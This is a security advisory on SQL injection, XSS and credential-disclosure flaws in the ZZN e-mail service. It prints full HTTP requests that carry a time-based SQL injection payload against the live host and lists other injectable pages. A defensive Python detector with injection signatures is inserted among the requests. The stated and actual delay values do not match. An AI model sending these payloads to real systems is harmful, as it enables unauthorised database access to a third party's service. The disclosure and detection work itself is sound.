ZZN SQL Injection / XSS / Credential Disclosure Vulnerabilities

Published: 2013-08-09
Updated: 2013-08-11

Affected systems:
zzn zzn
Description:
--------------------------------------------------------------------------------
CVE(CAN) ID: CVE-2007-0177

ZZN is a hosted (virtual-host) e-mail service.

ZZN's implementation contains multiple XSS, remote blind SQL injection and credential disclosure vulnerabilities. These allow a remote attacker to perform unauthorized database operations, among other impacts.

<*Source: Juan Carlos García

  Link: http://packetstormsecurity.com/files/122763/ZZN-SQL-Injection-XSS-Credential-Disclosure.html
*>

Test method:
--------------------------------------------------------------------------------

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Users bear the risk themselves!

1. URL-encoded POST input company was set to X'; WAIT FOR DELAY '0:0:4' --

POST /membersarea_en/support_abuse.asp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn=3540124170.20480.0000; ASPSESSIONIDCACSTCRR=LOBIKGEDEGMDAPNNMPGPGHHE; ASPSESSIONIDACCSTCRR=GPBIKGEDMBJEMAJEEMDILMMC
Host: www.zzn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

beenThere=yeah&company=X%27%3b%20waitfor%20delay%20%270%3a0%3a2%27%20--%20&Complaint=secnight&[email protected]&FirstName=secnight&inout=fromzzn&LastName=secnight&Phone=555-666-0606&RetURL=http%3a%2f%2fwww.zzn.com%2fmembersarea_en&SpamCopy=&[email protected]&VirtIP=

 

2. URL-encoded POST input company was set to X'; WAIT FOR DELAY '0:0:4' --

POST /membersarea_en/support_abuse.asp HTTP/1.1
Content-Length: 280
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn=3540124170.20480.0000; ASPSESSIONIDCACSTCRR=LOBIKGEDEGMDAPNNMPGPGHHE; ASPSESSIONIDACCSTCRR=GPBIKGEDMBJEMAJEEMDILMMC
Host: www.zzn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

beenThere=yeah&company=X%27%3b%20waitfor%20delay%20%270%3a0%3a2%27%20--%20&Complaint=secnight&[email protected]&FirstName=secnight&inout=fromzzn&LastName=secnight&Phone=555-666-0606&RetURL=http%3a%2f%2fwww.zzn.com%2fmembersarea_en&SpamCopy=&[email protected]&VirtIP=
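From the defender's side, the requests above are easy to spot in web-server or WAF logs once the form body is URL-decoded: the injected value carries a T-SQL WAITFOR DELAY and a quote-plus-comment tail. The following detector is an added example, not code from the advisory or from ZZN; the two sample bodies are constructed (the first mirrors the advisory's POST body with the e-mail fields dropped), and the signature names are my own.

```python
import re
from urllib.parse import parse_qs, unquote_plus

# Constructed sample bodies (added example, not the advisory's own code). The first is the
# POST body from the advisory with the e-mail fields dropped; the second is a benign
# submission of the same form for comparison.
INJECTED_BODY = (
    "beenThere=yeah&company=X%27%3b%20waitfor%20delay%20%270%3a0%3a2%27%20--%20"
    "&Complaint=secnight&FirstName=secnight&inout=fromzzn&LastName=secnight"
    "&Phone=555-666-0606&RetURL=http%3a%2f%2fwww.zzn.com%2fmembersarea_en&SpamCopy=&VirtIP="
)
BENIGN_BODY = "beenThere=yeah&company=Acme%20Ltd&Complaint=spam&FirstName=Ann&RetURL=http%3a%2f%2fwww.zzn.com"

# Signatures for time-based (blind) SQL injection. WAITFOR DELAY is the T-SQL form used
# against this ASP/MSSQL target; the others cover the MySQL and PostgreSQL equivalents.
SIGNATURES = {
    "mssql_waitfor_delay": re.compile(r"waitfor\s+delay\s+'\d+:\d+:\d+'", re.I),
    "mysql_sleep": re.compile(r"\bsleep\s*\(\s*\d+", re.I),
    "postgres_pg_sleep": re.compile(r"\bpg_sleep\s*\(", re.I),
    # A value that closes a string literal, terminates the statement and comments out the rest.
    "quote_then_comment": re.compile(r"'\s*;.*--\s*$", re.S),
}


def decode_form(body):
    """Decode a form body, then decode each value once more to catch double-encoded payloads."""
    fields = parse_qs(body, keep_blank_values=True)
    return {name: [unquote_plus(v) for v in values] for name, values in fields.items()}


def find_injection_indicators(body):
    """Return (field, signature) pairs for every decoded field value that matches a signature."""
    hits = []
    for name, values in decode_form(body).items():
        for value in values:
            for sig_name, pattern in SIGNATURES.items():
                if pattern.search(value):
                    hits.append((name, sig_name))
    return hits


if __name__ == "__main__":
    for label, body in (("injected", INJECTED_BODY), ("benign", BENIGN_BODY)):
        print(label, find_injection_indicators(body))
```

Run against access logs that retain POST bodies, a hit on `mssql_waitfor_delay` paired with a response time close to the requested delay is strong confirmation that the parameter is injectable and should be parameterized rather than concatenated into the query.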

Proof Of Concept
----------------

These files have at least one input (GET or POST).


/membersarea_en/home.asp - 3 inputs
/membersarea_en/joinframes.asp - 2 inputs
/membersarea_en/emailaccount.asp - 4 inputs
/membersarea_en/preminder.asp - 1 input
/membersarea_en/signup.asp - 2 inputs
/membersarea_en/support.asp - 1 input
/membersarea_en/insidelogin.asp - 2 inputs
/membersarea_en/directemailerror.asp - 1 input
/membersarea_en/alertwindow.asp - 1 input
/membersarea_en/loginerror.asp - 1 input
/membersarea_en/support_abuse.asp - 1 input
/membersarea_en/copy%20of%20emailaccount.asp - 1 input
/membersarea_en/directregister.asp - 1 input
/zlog - 1 input
/zlog/blog_error.asp - 1 input

Recommendation:
--------------------------------------------------------------------------------
Vendor patch:

zzn
---
The vendor has not yet released a patch or upgrade. Users of this software are advised to monitor the vendor's homepage for the latest version:

http://www.zzn.com
